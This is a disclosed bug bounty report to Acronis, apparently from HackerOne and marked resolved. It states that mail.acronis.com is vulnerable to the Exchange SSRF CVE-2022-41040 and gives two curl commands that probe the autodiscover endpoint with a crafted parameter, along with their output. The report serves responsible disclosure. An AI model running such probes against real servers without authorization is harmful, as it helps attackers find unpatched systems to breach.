mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040

Disclosed: 2022-10-13 17:12:43 By bbece5b1ea2cbb33d0690ad To acronis
Critical
Vulnerability Details
Hello Acronis team, Please run curl -ksL -m5 -o /dev/null -I -w "%{http_code}" "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" curl -ksL -m5 "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" | grep Protocol and get following output 404 and {"Protocol":"ActiveSync","Url":"https://eas.outlook.com/Microsoft-Server-ActiveSync"} Proving that mail.acronis.com is vulnerable to CVE-2022-41040 Poc video attached ## Impact SSRF can be used to for unauthorized actions or access to confidential data.
Actions
View on HackerOne
Report Stats
  • Report ID: 1719719
  • State: Closed
  • Substate: resolved
  • Upvotes: 70
Share this report